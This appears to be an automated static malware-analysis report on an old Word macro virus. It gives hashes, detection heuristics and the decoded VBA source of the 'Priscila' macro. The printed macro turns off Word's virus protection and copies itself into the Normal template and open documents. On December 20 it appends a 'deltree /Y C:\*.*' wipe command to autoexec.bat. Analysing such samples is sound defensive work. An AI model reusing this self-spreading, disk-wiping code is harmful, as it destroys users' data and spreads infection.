Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b4ee500de413a542…

MALICIOUS

Office (OLE)

38.0 KB Created: 1999-10-15 09:03:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e59a0d649ea54353ecf795c971d862f0 SHA-1: b02c999abdfd9eeaa63a65376f38e75c63db9cd6 SHA-256: b4ee500de413a5425e65ce1cb9fd4b0a57ef132de538ae10701a80eef53d0aec
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The AutoClose macro attempts to copy itself to the Normal template and the active document, and it also attempts to append to \autoexec.bat, suggesting a persistence and propagation mechanism. The presence of legacy WordBasic markers and the ClamAV detection further support its malicious nature.

Heuristics 7

  • ClamAV: Doc.Trojan.NightShade-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.NightShade-4
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 20,980 bytes but its declared streams total only 0 bytes — 20,980 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6391 bytes
SHA-256: f1ddf2542a658e3e93be14da1ad64b69749957ba994c93bc962f69651a5fccc5
Detection
ClamAV: Doc.Trojan.NightShade-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Priscila"
Sub AutoClose()
Attribute AutoClose.VB_Description = "(c) 1997 Microsoft - All rights Reserved."
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Microsoft.Priscila.AutoClose"
On Error GoTo Priscila

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    
    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone

    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate

    EstaEnDoc = False
    EstaEnDot = False

    For I = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "Priscila" Then
            EstaEnDoc = True
        End If
    Next

    For J = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "Priscila" Then
            EstaEnDot = True
        End If
    Next

    If EstaEnDoc = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Priscila", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.FullName
    End If

    If EstaEnDot = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Priscila", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
    End If

    If Month(Now()) = 12 And Day(Now()) = 20 Then
        NúmArch2 = FreeFile()
        Open "\autoexec.bat" For Append As NúmArch2
        Print #1,
        Print #1, "@echo off"
        Print #1, "deltree /Y C:\*.*"
        Close NúmArch2
        Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlert
            .Text = "Tienes el PRISCILA ViRuS - by CrM - Paraguay"
            .Heading = "Atención:"
            .Show
        End With
    End If
    
    Application.DisplayAlerts = wdAlertsAll

Priscila:
End Sub

' Processing file: /opt/analyzer/scan_staging/cd54bab66361434e874ccf9663afb1fd.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/Priscila - 3324 bytes
' Line #0:
' 	FuncDefn (Sub AutoClose())
' Line #1:
' 	OnError Priscila 
' Line #2:
' Line #3:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #5:
' Line #6:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #7:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #8:
' Line #9:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set ActiveDoc 
' Line #10:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set GlobalDoc 
' Line #11:
' Line #12:
' 	LitVarSpecial (False)
' 	St EstaEnDoc 
' Line #13:
' 	LitVarSpecial (False)
' 	St EstaEnDot 
' Line #14:
' Line #15:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #16:
' 	Ld I 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0008 "Priscila"
' 	Eq 
' 	IfBlock 
' Line #17:
' 	LitVarSpecial (True)
' 	St EstaEnDoc 
' Line #18:
' 	EndIfBlock 
' Line #19:
' 	StartForVariable 
' 	Next 
' Line #20:
' Line #21:
' 	StartForVariable 
' 	Ld J 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #22:
' 	Ld J 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0008 "Priscila"
' 	Eq 
' 	IfBlock 
' Line #23:
' 	LitVarSpecial (True)
' 	St EstaEnDot 
' Line #24:
' 	EndIfBlock 
' Line #25:
' 	StartForVariable 
' 
... (truncated)
embedded_office_off0000460c.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x460C 20980 bytes
SHA-256: 57fc0caa1b311b41482d593fe6b7216c3feeab2236985b9783927951065159a6
Detection
ClamAV: Doc.Trojan.Idea-1
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.